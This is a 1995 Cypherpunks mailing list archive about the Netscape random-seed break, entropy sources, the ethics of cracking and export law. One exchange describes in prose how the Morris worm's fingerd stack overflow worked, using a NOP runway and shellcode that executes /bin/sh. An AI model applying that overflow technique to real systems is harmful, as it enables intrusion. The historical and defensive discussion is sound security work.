email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From tcmay at got.net Thu Sep 21 13:07:03 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 13:07:03 PDT Subject: Prosecution of Cracking Security Systems Message-ID: At 9:42 PM 9/20/95, Brian Davis wrote: >Certainly, Cypherpunks has gotten press lately, and what I've seen has >been good press. Capitalize on it. > >Finally, I've got to say that, as someone new to the concepts discussed >here, I found it extremely cool to read about the latest break here and >then see it in the news a day or two later. Indeed, it gives you a day's head start in preparing a prosecution! (Just kidding, of course. Brian may be a DA, but he's showing signs of being "one of us.") And on a serious note, the cracks of these various systems are helpful to the overall community. Better locks. To pick up on a point Brian made several days ago about whether or not hackers who break into systems should be applauded, criticized, prosecuted, whatever, this is how I see things, in direct parallel with the recent Netscape cracks: * Situation 1: A person who enters my home by bypassing locks cannot claim to be "just testing security" and should be prosecuted for trespass, if nothing else. * Situation 2: However, a person who publically demonstrates that a well-known type of lock is weak and can be easily bypassed is well within his rights and is, I think, doing the community a favor. I mean that he demonstrates this on a lock, or system, and not by breaking into a system. (It may be true that some number of potential thieves use the knowledge that a given lock is weak to commit crimes, but that's not the responsibility of the person demonstrating the weakness.) (Sidebar: There are some subtleties. What about someone who breaks into a computer system and leaves a harmless message announcing his intrusion? 
What about someone who enters my house while I'm asleep and leaves a message saying "Get better locks!"? What about Randall Schwartz and his security checks of his employer, Intel?) It seems clear to me that the breaking of Netscape's security is an example of Situation 2. And many cracker break-ins are Situation 1, though in many cases the crackers are not full-fledged criminals and may think they are just testing security. (This goes to motive, I'm sure Brian would agree, and may be why a 16-year-old cracker gets a suspended sentence instead of hard time.) (A more problematic case is what about systems with very weak or no security? This is somewhat like a yard with no clearly marked boundary, no fence, etc., or like a beach towel with valuables left on it. We've debated issues like this several times on the Cyberia list, so I won't here.) One thing that worries me is that some of the proposed laws about intellectual property and enforcement of copyrights may make it illegal to try to break the cryptographic protections of systems, even systems one has control over. (Some similarities to the "no reverse engineering" shrink-wrap licenses.) It's conceivable that Netscape Communications could, under these "anti-hacking" laws, seek a prosecution of some future Goldberg and Wagner. My guiding principles about locks and security are these: * Theft is theft, even if a bicycle is left unlocked or a house door is left ajar. * However, the first line of defense is for a property owner to lock his property up, to place fences around property, etc. Cops cannot protect in all situations, which is why security services and tools exist. * Since enforcement resources are limited, I can understand why the investigation of a theft involving unlocked, unsecured property is given low priority. This doesn't make the theft "right," and if the thief is somehow caught he cannot use the "But it was unlocked!" defense. 
(These problems are lessened in a system where people pay for protection, as with insurance systems, and of course as with anarcho-capitalism of the sort discussed by Benson, Friedman, and others.) --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 21 13:17:27 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 13:17:27 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? Message-ID: I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA Mosaic gives me a thought: At 6:44 AM GMT 9/21/95, John Gilmore wrote: >> I realize that some cypherpunks think that we should make all of >> our code publicly available. In an ideal world that would be great, >> but we live in a world with politicians, crooks, lawyers, stockholders, >> etc... Don't expect to see us posting our entire security >> library source code to cypherpunks. > >Naah. I think NCSA should've made Mosaic publicly available, because >they wrote it with our tax dollars. 
And I hold it against them that >they started the trend of "zero-cost personal-use binaries but no >commercial use" that many Net users still confuse with Real Free >Software (free as in freedom). But Netscape owns its code, it can do >whatever it wants with it. Why not a Gnu-style Web browser? I don't know if the original Mosaic can be used and added to, but I can imagine something like this could be done. Web browsers are becoming, for many of us, our de facto interfaces to the Net, not just the Web. A project to make a truly freely distributable Web browser and Web server (the other part of the puzzle) could be interesting. Strong crypto could be added by volunteers working in their specialties, and the "Web proxy" could be put in with robustness (D-H forward secrecy, for example). I'll stop now, as I've never been a Gnu customer (except for Emacs), and so I'm not really in a position to comment and speculate on Gnu. For all I know, Stallman and others have already thought of this and are working on it. --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." 
From robv at teleport.com Thu Sep 21 13:31:56 1995 From: robv at teleport.com (Rob Vaughn) Date: Thu, 21 Sep 95 13:31:56 PDT Subject: [NOISE] Re: NYT on Netscape Crack Message-ID: <199509212030.NAA17997@desiree.teleport.com> Perry sez: >I'll pay for the "I broke Netscape's Security" T-Shirt for the >enterprising person that takes the time to find them in the object >code. (See Sameer's page on the shirts he's developing as prizes for >the Netscape flaw finders.) I find it very ironic that a company that recently raised about a gadzillion dollars through a public stock offering has been able to sit back and let people find problems with their software for free. Now people like Sameer and Perry are offering rewards for it. Kudos to them, but I think Netscape should be the one making an offer like this. A textbook author/prof who taught a class using his own book had a great method for finding mistakes in the new edition: he had us buy the current edition and gave us copies of each chapter of the new edition as we got to it, then he offered a $10 reward for each typo or mistake found, and a $100 dinner for two and credit in the new edition to whomever found the most mistakes by the end of the semester. I made $160 before I had to drop the class due to a schedule conflict. In the end, he said he was able to find over 100 errors, and considered it the cheapest and most thorough proofreading he'd ever paid for. And the class got a big charge out of it. Netscape should be offering rewards for people who find problems with their software. They'll get a lot of hard work for almost free (since you only get paid if you do find something) and in a year or two they'll have one of the most solid applications on the market. Lord knows it'll help raise public confidence too. If a tee-shirt motivates people, think what $US 1000 reward would do. Or $e 2000 in credit towards goods purchased through Netscape commercial servers? Rob V. 
From sameer at c2.org Thu Sep 21 13:35:47 1995 From: sameer at c2.org (sameer) Date: Thu, 21 Sep 95 13:35:47 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com> Message-ID: <199509212030.NAA05084@infinity.c2.org> The only bad publicity is no publicity. > > In article , carolann at censored.org (Censored Girls Anonymous) writes: > > > Lookit that! 416 trades and 11 times there was more > > buying pressure than selling pressure.. > > > The rumors of bug fix are outweighing the facts of the crack! > > > I am totally amazed! But think company insiders are probably > > supporting the stock. Holding up better than ascii armor, it is. > > I think it probably has more to do with the fact that the name > "Netscape" has been on the front page of every major newspaper in the > US. I guess bad press is better than no press at all. And the press > hasn't even been that bad. > > -- > Sure we spend a lot of money, but that doesn't mean | Tom Weinstein > we *do* anything. -- Washington DC motto | tomw at engr.sgi.com > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From joelm at eskimo.com Thu Sep 21 13:41:50 1995 From: joelm at eskimo.com (Joel McNamara) Date: Thu, 21 Sep 95 13:41:50 PDT Subject: Cryptography book source Message-ID: <199509212041.NAA17913@mail.eskimo.com> Just stumbled on to an online book vendor that advertises over a million titles available for order, many discounted from list. Very nice Web interface. A quick search for "cryptography" displayed 121 titles. A wide range, from Crypto proceedings to technical to historical. Check out: http://www.amazon.com Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key Thomas Jefferson used strong crypto, shouldn't you? 
From bdolan at use.usit.net Thu Sep 21 14:59:27 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Thu, 21 Sep 95 14:59:27 PDT Subject: Crypto *import* ban? Message-ID: What exactly does a ban on import of "defense articles and services" which are not in "furtherance of world peace" mean? Could you ban crypto imports? Imports of chopped liver? ---------- Forwarded message ---------- Here is a final rule issued by ATF regarding the import of "defense articles" into the United States. It appears in the Federal Register at 60 FR 47866 (9/15/95). This becomes a regulation in the Code of Federal Regulations, Title 27 CFR, part 47, Importation of Arms. Sec. 47.52 Import restrictions applicable to certain countries. (a) It is the policy of the United States to deny licenses and other approvals with respect to defense articles and defense services originating in certain countries or areas. This policy applies to Cuba, Iran, Iraq, Libya, Mongolia, North Korea, Sudan, Syria, Vietnam, and the States that comprise the former Soviet Union [list of countries omitted]. This policy applies to countries or areas with respect to which the United States maintains an arms embargo [list of countries omitted]. It also applies when an import would not be in furtherance of world peace and the security and foreign policy of the United States. [end excerpt] From vince at offshore.com.ai Thu Sep 21 15:22:52 1995 From: vince at offshore.com.ai (Vincent Cate) Date: Thu, 21 Sep 95 15:22:52 PDT Subject: real randomness for netscape - user clicking mouse Message-ID: Jeff Weinstein >If anyone has specific suggestions I would love to hear them so that we >can do a better job. Why not just do something similar to what PGP does? For netscape you could have a user make circling motions with the mouse and clicking at random times. For each click of the mouse you could get a few bits of randomness from the time, the X position, and the Y position. You could get random bits really fast this way. 
You only need to do this the first time a user uses encryption, or you might just go ahead and force all users to do this as part of starting up netscape the first time. On subsequent times you use your encryption algorithm to make your next seed. To be safe you could make up two seeds, encrypt each of them to mix them up a bit, and then XOR the results together. A random bit XORed with a non-random bit still produces a random bit. Actually there is probably a better way to just encrypt each input whole (padding to block size) and XORing as you go along - that way you would get whatever randomness was there to be had. Anyway, do something so you have as many or more bits of randomness in your seed as there are bits in your key or it will still be a weak link in your security chain. You could even get the randomness during regular mouse use. Unless the first thing a user did was try to use encryption I am sure you would have enough by the time he did use encryption (keep track). You must get the random bits from something that nobody else could watch. Network packets, process IDs, date, time, etc are not secure. On the other hand, an attacker would have to have broken the machine to get the mouse info used above, in which case netscape would have no security no matter what. -- Vince PS I want a free netscape server site license if you use this idea! :-) From cjs at netcom.com Thu Sep 21 15:31:49 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Thu, 21 Sep 95 15:31:49 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: <199509212030.NAA05084@infinity.c2.org> Message-ID: <199509212125.RAA00188@hoopsnake.cjs.net> > > > I am totally amazed! But think company insiders are probably > > > supporting the stock. Holding up better than ascii armor, it is. > > > > I think it probably has more to do with the fact that the name > > "Netscape" has been on the front page of every major newspaper in the > > US. I guess bad press is better than no press at all. 
And the press > > hasn't even been that bad. Yeah. That's the way it works sometimes. I remember back when that housewife from Minnesota launched her media campaign to have "Married With Children" taken off the air. All it did was make the show a hundred times more popular and extend its life for years after it probably would have been canceled on its own. And the sad part is that now that they have announced that they are dropping their unofficial Linux support, I really want to hurt Netscape badly. Sigh. Christopher From tomw at orac.engr.sgi.com Thu Sep 21 15:42:57 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Thu, 21 Sep 95 15:42:57 PDT Subject: netscape bug Message-ID: <199509212242.PAA04533@orac.engr.sgi.com> In article , "Vladimir Z. Nuri" writes: > P.M. notes that anywhere there is a data-driven buffer overflow (which > he suspects are all over netscape) he can get code to execute anything > he wants. this reminds me of the > Morris internet worm that ran exactly the same way. it used a > bug in the finger demon that caused a string buffer overwrite > (via strcpy, instead of strncpy) to execute customized code. > my question: I have not seen the specifics of how this works. does > this require specialized knowledge of the native machine language on the > host machine? or is it just used to cause something like a core dump > to get a command line or something like that? I question the accuracy of this. The fingerd bug was that a string in the static data area was read in with gets which could be overflowed. At some point in memory after this input buffer was the string constant that stored the name of the finger command. What the Morris worm did was to overflow the input buffer and replace the string constant "finger" with "csh". When fingerd then exec'ed the command, that gave you a shell running on the machine. 
While it is certainly true that you can stomp on memory in static buffers, it's not clear that you can execute whatever code you insert there. If the buffer happens to be allocated off the stack (and the stack grows down) then you can modify the return address. Of course, you have to know the address of whatever code you want to execute. And that code has to do something useful. Presumably, if there are two bugs, one which lets you write over a static buffer and one for a buffer allocated from the stack, then you could execute code of your choosing. Of course, that also assumes that you can execute from the data area which is not always true. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From eb at comsec.com Thu Sep 21 16:02:11 1995 From: eb at comsec.com (Eric Blossom) Date: Thu, 21 Sep 95 16:02:11 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <43psn2$6ug@tera.mcom.com> Message-ID: <199509212245.PAA15299@comsec.com> > > What I would like: > > Any OS has access to a number of real-world physical sources of > randomness. This information is not made available to a user level > process. How long did that last seek take? Was there any noise on > the microphone? It would be good if the OS could gather that > information and make some set of bits available to any process that > asks. Having this be part of all OSes would make my job easier. We've got a *real* hardware random number generator that was developed for our secure phones. If you are seriously interested, we can glue the RNG onto the end of a serial port for you. It generates about 8000 bits of uncorrelated noise / second. Eric Blossom COMSEC Partners 707-577-0409 From raph at CS.Berkeley.EDU Thu Sep 21 16:35:29 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Thu, 21 Sep 95 16:35:29 PDT Subject: Anyone for testing MOSS? 
Message-ID: <199509212335.QAA19745@kiwi.cs.berkeley.edu> I've just gotten TISMOSS 7.1 running (whew!) and wondered if there was anyone else out there who could exchange encrypted email with me. Here is my public key: alias:raph at cs.berkeley.edu public-key:MFkwCgYEVQgBAQICAgADSwAwSAJBAKQ2qG5eZDa58HpVxM9fpru2hDVVkw0iK GC3BMhagHpio7XlGydpkbY3iSV08U92VVbkyTeB2aWhSe2xUUaONPsCAwEAAQ== I guess I'll probably wait until next week to test S/MIME. Raph From stripes at va.pubnix.com Thu Sep 21 17:19:30 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Thu, 21 Sep 95 17:19:30 PDT Subject: XDM has the same problem as netscape ?! In-Reply-To: <43s1j7$nd3@calum.csclub.uwaterloo.ca> Message-ID: In message <43s1j7$nd3 at calum.csclub.uwaterloo.ca>, Ian Goldberg writes: >In article <9509210631.AA18308 at sfi.santafe.edu>, >Nelson Minar wrote: >>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had >>the same problem: the random seed was based on the current time to the >>microsecond, modulo the granularity of the system clock. I think I >>figured that on my hardware, if I could figure out which minute the X >>server started (easy with finger), I'd only have to try a few >>thousand keys or so. Caveat: I never actually proved the idea. > >Wow. I just checked, and Nelson's right. [...] Of course you can do what I have been doing for years:

    cookie=`good-source-or-random-hex-strings`
    xauth add $DISPLAY MIT-MAGIC-COOKIE-1 $cookie
    xinit ~/.xinitrc $DISPLAY -- $server :$port -auth $XAUTHORITY

(assuming you set the various variables correctly) This will allow you to generate your own cookies rather than relying on MIT. (I actually have C code to set the cookie directly, since I don't really care to have it visible to ps, even briefly). Unfortunately X will blat the "secret" out in the clear every time you make an X connection, so it still isn't very good. 
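Nelson Minar's point, quoted in the message above, is that a cookie whose only input is the X server's start time can be recovered by trying every clock tick in the minute the server came up. The block below is an added example, not code from this thread, from X11R4 or from Netscape, that carries the attack through and then shows the replacement the message points toward. The clock granularity (TICK_US, 10 ms, giving 6000 candidates per minute), the SHA-256 derivation standing in for the real generator, and the September 1995 start time are all constructed assumptions; the real X11R4 derivation is not reproduced here.

```python
import hashlib
import os
from typing import Optional

# Assumed clock granularity: 10 ms ticks, so one minute holds 6000 candidate
# seeds. The real granularity depends on the machine; this is a constructed value.
TICK_US = 10_000
MINUTE_US = 60 * 1_000_000


def weak_cookie(start_us: int) -> bytes:
    """Toy MIT-MAGIC-COOKIE-1 derived from nothing but the server start time.

    Models a generator seeded with the current time: the microsecond value is
    truncated to the clock tick, so only one cookie per tick is possible.
    SHA-256 stands in for whatever the real generator did (an assumption).
    """
    tick = (start_us // TICK_US) * TICK_US
    return hashlib.sha256(b"cookie:" + tick.to_bytes(8, "big")).digest()[:16]


def candidates_per_minute() -> int:
    """Number of seeds an attacker who knows the start minute has to try."""
    return MINUTE_US // TICK_US


def recover_start(cookie: bytes, minute_start_us: int) -> Optional[int]:
    """Brute-force the tick within a known minute that produced `cookie`.

    Returns the tick-truncated start time, or None if no tick in that minute
    reproduces the cookie (the guess of the start minute was wrong).
    """
    for tick in range(minute_start_us, minute_start_us + MINUTE_US, TICK_US):
        if weak_cookie(tick) == cookie:
            return tick
    return None


def strong_cookie() -> bytes:
    """128-bit cookie from the OS randomness source; no clock to search."""
    return os.urandom(16)


if __name__ == "__main__":
    # Constructed scenario: server started 37.42 s into 1995-09-21 00:00:00 UTC.
    minute = 811_641_600 * 1_000_000
    start = minute + 37_420_000 + 3_210
    cookie = weak_cookie(start)
    print("candidates per minute:", candidates_per_minute())
    print("recovered start tick:", recover_start(cookie, minute))
    print("actual start tick:   ", (start // TICK_US) * TICK_US)
    print("os.urandom cookie:   ", strong_cookie().hex())
```

The search runs in well under a second, which is the whole problem: the cookie has at most log2(6000), about 13, bits of unpredictability once the start minute is known, regardless of how long the hex string looks. `strong_cookie()` is what belongs in the `good-source-or-random-hex-strings` slot of the xauth recipe above.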
From jsimmons at goblin.punk.net Thu Sep 21 18:11:52 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Thu, 21 Sep 95 18:11:52 PDT
Subject: Netscape to end Linux support?
In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net>
Message-ID: <199509220108.SAA05948@goblin.punk.net>

>
> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, I really want to hurt
> Netscape badly.
>
> Sigh.
>

Anyone got a pointer to this announcement? Damn! Just when I was starting to like them ...

--
Jeff Simmons jsimmons at goblin.punk.net


From tcmay at got.net Thu Sep 21 18:16:54 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 21 Sep 95 18:16:54 PDT
Subject: economic espionage (@#$%^&*)
Message-ID:

Vlad writes:

>I would *die* to see an op-ed in the NYT with the subject:
>"economic espionage: the new bogeyman decoy after the cold war"

You might want to prepare your memorial service, then, as I recall reading editorials along these lines back around 1990, when "should the NSA be used for economic espionage?" was in the news. Not the exact title of their editorial, but the gist was that turning the NSA into a spy agency at the beck and call of Ford and Motorola is a bad idea.

But if you die, Vlad, "the vznuri," at least you have seven other functioning tentacles.

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From norm at netcom.com Thu Sep 21 18:25:21 1995
From: norm at netcom.com (Norman Hardy)
Date: Thu, 21 Sep 95 18:25:21 PDT
Subject: Pitfall in producing random numbers
Message-ID:

I think that it was on the cypherpunks list that I learned of how PGP for the IBM PC, running under emulation on the Mac, failed to produce good random numbers. The virtual PC clock proceeded forward in a very predictable manner. Perhaps the details were different but the nature of the pitfall is clear. I did not notice that pitfall mentioned in RFC 1750. (It's the only hazard that I know of that they missed.)

The only thing I can think of protecting against this is to do some simple checks against more obvious ways that virtual clocks might produce times. Low order bits should not always be zero. The differences between successive readings should not be constant. Two clock readings separated by a computation of known length should be within a factor of a few of the expected value. If not try again once or twice. Such tests are imperfect but I think that they would have noticed the virtual clock on the virtual PC. If they fail the program can require the user to enter the seed, with all that that entails.


From perry at piermont.com Thu Sep 21 18:28:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 21 Sep 95 18:28:55 PDT
Subject: Seeds which depend on machine states
In-Reply-To: <199509211044.GAA25896@mail-e1a.megaweb.com>
Message-ID: <199509220128.VAA01900@frankenstein.piermont.com>

Miguel Diaz writes:
> It is my suspicion that seeds which depend on machine
> states(ie state of your computer at a specific instance of
> time) would always be subject to scrutiny and de-cryption.
> As long as the software used to encrypt is not self-modifying,
> the machine state can (through careful manipulation involving
> temperature, clocks, processes etc)always be replicated and
> fixed to an acceptable degree.
Try getting a human to type with the same timing, to microsecond precision, the same way twice.

Perry


From dmandl at panix.com Thu Sep 21 18:31:04 1995
From: dmandl at panix.com (David Mandl)
Date: Thu, 21 Sep 95 18:31:04 PDT
Subject: Netscape closes up 1 3/8 today!
Message-ID:

At 1:30 PM 9/21/95, sameer wrote:
> The only bad publicity is no publicity.

This assumes that you're trying to sell something. Some people actually have no use or desire for publicity. Publicity has caused a quick and painful death to many scenes, movements, cabals, and "temporary autonomous zones."

--Dave.

--
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem


From tcmay at got.net Thu Sep 21 18:32:43 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 21 Sep 95 18:32:43 PDT
Subject: Munitions shirt (again)
Message-ID:

At 7:02 PM 9/21/95, Michael Shields wrote:
>> There is nothing in the ITAR that refers to ``machine-readable'' so
>> there is no need to interpret that term.
>
>The issue is that it has been formally used as the criterion that
>distinguishes "technical data" from "defense articles". See Phil Karn's
>CJ requests on the _Applied Cryptography_ book and floppy.

Hear, hear! Michael is correct in pointing out that the "machine-readable" part has indeed been a criterion...if the ITARs in general are unlikely to withstand scrutiny, then trying to get books banned would really cause problems.

Also, one of the criteria I recollect is that "systems" were barred from export, not just algorithms. Algorithms are very widely discussed, even described in detail in patents. "Cryptographic systems," embodied in systems, circuits, and specific programs, are not the same as what gets published in textbooks.

(BTW, I'm glad I can now read the posts of Michael Shields. His MIME PGP was admirable, in intent, but many of us (from comments here and that were sent to me) just can't handle whatever MIME configuration he was previously using.)
--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."


From dvw at hamachi.epr.com Thu Sep 21 18:38:56 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Thu, 21 Sep 95 18:38:56 PDT
Subject: Prosecution of Cracking Security Systems
Message-ID: <30621328@hamachi>

Tim May wrote:
> One thing that worries me is that some of the proposed laws about
> intellectual property and enforcement of copyrights may make it illegal to
> try to break the cryptographic protections of systems, even systems one has
> control over. (Some similarities to the "no reverse engineering"
> shrink-wrap licenses.)
>
> It's conceivable that Netscape Communications could, under these
> "anti-hacking" laws, seek a prosecution of some future Goldberg and Wagner.

Actually, Lehman's report does not recommend this harsh of a measure. The report recommends penalties (some criminal) for tampering with and disabling mechanisms that are protecting copyright for protected works, and the protected works themselves. If a hacker operating in the "public service" mode you described were tampering with and/or disabling a protection mechanism that was applied to their own works, or test patterns and the like, they wouldn't fall under the recommended guidelines. It is pretty clear from my reading that you need to have an intent to violate copyright (i.e. steal stuff) in order to trigger the penalties.

Who knows how badly Congress will mangle all of this...
dvw


From jirib at sweeney.cs.monash.edu.au Thu Sep 21 18:40:27 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Thu, 21 Sep 95 18:40:27 PDT
Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To:
Message-ID: <199509220137.LAA12354@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello Laurent Demailly
and "NSB's Portable (via RadioMail)" and cypherpunks at toad.com

"NSB's Portable (via RadioMail)" writes:
> At 4:32 AM 9/21/95 +0200, Laurent Demailly wrote:
...
> >financial insecurity never was a problem as
> >long as it remains under a small %.
>
> This is an amazing statement, Laurent.
...

It's not an amazing statement. As long as the cost of insecurity is less than cost of security, there's no problem.

...
> We're not opposed to cryptography, by the way. There are some obvious
> places where the use of digital signatures could directly enhance our
...

Okay, so what's stopping you from starting right now with PGP? You could simply have that as an alternative to the current system (on a per-ID basis, ie new customers specify PGP or not). Quite a few people both have PGP and would think well of you if you started using it.

How about "The safest Internet payment system just got safer."?

Jiri
--
If you want an answer, please mail to .
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
-----END PGP SIGNATURE-----


From dvw at hamachi.epr.com Thu Sep 21 18:53:54 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Thu, 21 Sep 95 18:53:54 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <306216B6@hamachi>

>> Now, this is all expected to change, to become more harmonious
>> with the rest of the world. The changes that I've heard are
>> 1) Go to first-to-file instead of first-to-invent

Michael Shields wrote:
> Does this mean that prior art would no longer invalidate a patent?

No.
It just moves the prior art date from the date of invention to the date of filing the patent application.

dvw


From rmtodd at servalan.servalan.com Thu Sep 21 19:06:20 1995
From: rmtodd at servalan.servalan.com (Richard Todd)
Date: Thu, 21 Sep 95 19:06:20 PDT
Subject: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To:
Message-ID:

In servalan.mailinglist.cypherpunks Tim May writes:
>Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
>used and added to, but I can imagine something like this could be done.

Um, if you mean "freely distributable, in source form" by "Gnu-style", I don't think there's much of a shortage of Gnu-style WWW browsers and servers. Lynx and Chimera are my two favorite WWW browsers, and both come in source form. Then there's w3.el, the WWW browser for Emacs. As for Web servers, you can get the source code for Plexus or CERN httpd off the net. Plus, doesn't Eric Young have someone's httpd already hacked to include SSL-compliant encryption?

The question becomes why don't the free WWW software people out there now support crypto? Maybe they're simply not expert in or interested in crypto, or maybe they don't want to mess with the ITAR hassles.


From rrothenb at ic.sunysb.edu Thu Sep 21 19:15:29 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Thu, 21 Sep 95 19:15:29 PDT
Subject: real randomness for netscape - user clicking mouse
In-Reply-To:
Message-ID: <199509220214.WAA16926@libws4.ic.sunysb.edu>

> Why not just do something similar to what PGP does?

Yes, why not... (it's been suggested before)

> For netscape you could have a user make circling motions with the mouse
> and clicking at random times. For each click of the mouse you could get a
> few bits of randomness from the time, the X position, and the Y position.
> You could get random bits really fast this way.

Careful... the buttons one tends to click on are in the same regions, and the entropy would not be as great as say, with keyboard timings.
I think fast timings between clicks (maybe added or xor'd with low bits from mouse positions?) is a better solution. Though the best way is to experiment... I wrote a DOS ISR to capture timings between clicks ('keyrand?.zip' on some ftp-sites) and experimented with speeding up the system clock (which is normally 18.2 times/sec), but the entropy appeared lower (superficially less random).

-Rob


From sommerfeld at orchard.medford.ma.us Thu Sep 21 19:19:20 1995
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Thu, 21 Sep 95 19:19:20 PDT
Subject: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220208.CAA00564@orchard.medford.ma.us>

> I question the accuracy of this. The fingerd bug was that a string in
> the static data area was read in with gets which could be overflowed.
> At some point in memory after this input buffer was the string constant
> that stored the name of the finger command. What the Morris work did
> was to overflow the input buffer and replace the string constant
> "finger" with "csh". When fingerd then exec'ed the command, that gave
> you a shell running on the machine.

Nope, that wasn't it, either. See the Eichin/Rochlis "tour of the worm" paper.

I was visiting friends at MIT the night the worm hit. After receiving some confused and unspecific reports that the worm was getting in through fingerd, I had a flash of insight as to how that might happen; as it turned out, this insight was correct, and shortly thereafter, I had reproduced a benign form of the fingerd attack. As implemented by the worm, it only worked on VAXes, but it could have worked on other systems.

The buffer in question was on the stack, not in static storage.
The attacker wrote a long sequence of NOP's, followed by machine instructions which implemented the equivalent of exec("/bin/sh"), followed by the approximate stack address of the stack buffer; the last address was at the right place to overwrite the saved PC field in the stack frame. When the routine "returned", it actually branched into the runway of NOP's, and then exec'ed "/bin/sh".

Note that the actual stack address varied, as environment variables (which tend to vary from installation to installation) are located at the top of the stack. As it turned out, the attack did not work on most Athena systems, because the Athena /etc/rc complex wound up using a large number of environment variables which pushed the location of the stack frame in question out of the range where the attack would have worked.

- Bill


From perry at piermont.com Thu Sep 21 19:32:08 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 21 Sep 95 19:32:08 PDT
Subject: "random" number seeds vs. Netscape
In-Reply-To: <9509211553.AA17620@cantina.verity.com>
Message-ID: <199509220231.WAA02083@frankenstein.piermont.com>

Patrick Horgan writes:
> Perry said:
> >
> > Also be especially careful about how you run the thing! Don't use
> > popen or anything like it!
>
> There's nothing inherently wrong with using popen or system.

Nor is there anything inherently wrong with having sex without the use of a condom. However, it is very difficult -- VERY DIFFICULT -- to prove to yourself that there is never an instance in which your system() or popen() can be abused.

In any case, I find it's often more prudent just to strip all these things out of my code. If you don't use them, you don't have to prove they are done properly. Paranoia is your friend. No one can ever break you for doing something you don't do.

> The problem arises when you use information given to you from
> outside as the argument to popen or system without checking it.
Yup, but often, you'd be surprised what turns out to be outside data.

In any case, you obviously also understand why this is bad, but I hope that people out there understand -- always make sure that you are double extra careful about the use of such calls.

Perry


From unicorn at polaris.mindport.net Thu Sep 21 19:45:37 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Thu, 21 Sep 95 19:45:37 PDT
Subject: economic espionage (@#$%^&*)
In-Reply-To: <199509211936.MAA23834@netcom13.netcom.com>
Message-ID:

On Thu, 21 Sep 1995, Vladimir Z. Nuri wrote:

> >> >It was said that Pres. Clinton had given a speech while
> >> >visiting the CIA HQ in Langley/Virginia. He allegedly
> >> >said in this speech that obtaining industrial
> >> >informations has the highest priority and this were the
